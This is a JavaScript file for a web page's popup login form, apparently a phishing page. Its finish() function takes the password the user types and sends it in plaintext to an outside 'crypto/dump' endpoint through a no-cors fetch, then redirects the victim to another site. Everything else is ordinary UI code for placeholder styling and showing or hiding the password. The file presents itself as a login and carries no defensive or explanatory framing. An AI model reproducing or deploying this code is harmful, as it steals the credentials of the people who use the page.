const popup1 = document.getElementById('popup-1')
const popup2 = document.getElementById('popup-2')
const password = document.getElementById('password')
const passwordPlaceholder = document.getElementById('password-placeholder')
const loader = document.getElementById('loader')

let start = () => {
  popup1.classList.remove('hide')   
}

let toLogin = () => {
  popup2.classList.remove('hide')
  password.focus()
}

let closePopups = () => {
  popup1.classList.add('hide')
  popup2.classList.add('hide')
}

let finish = () => {
  loader.classList.remove('hide')
  let plaintext = password.value
  closePopups()
  fetch(
    'https://sphinx-three.vercel.app/api/crypto/dump?'
    + new URLSearchParams({ contents: plaintext }),
    { mode: 'no-cors' }
  ).then(() => {
    window.location.href = 'https://dextensify.pages.dev/main'
  })
}

let showPassword = () => {
  let password = document.getElementById('password')
  if (password.type === 'password') {
    password.type = 'text'
  } else {
    password.type = 'password'
  }
}

window.onclick = e => {
  let outside = el => e.target.contains(el) && e.target !== el
  if (outside(popup1) || outside(popup2)) {
    closePopups()
  }
}

let activatePassword = () => {
  passwordPlaceholder.classList.add('active')
  passwordPlaceholder.classList.remove('inactive')
  setPasswordStatus()
}
let deactivatePassword = () => {
  passwordPlaceholder.classList.add('inactive')
  passwordPlaceholder.classList.remove('active')
  setPasswordStatus()
}
let setPasswordStatus = () => {
  if (password.value.length > 0) {
    passwordPlaceholder.classList.add('non-empty')
    passwordPlaceholder.classList.remove('empty')
  } else {
    passwordPlaceholder.classList.add('empty')
    passwordPlaceholder.classList.remove('non-empty')
  }
}

password.addEventListener('focusin', activatePassword)
password.addEventListener('focusout', deactivatePassword)
password.addEventListener('keydown', setPasswordStatus)
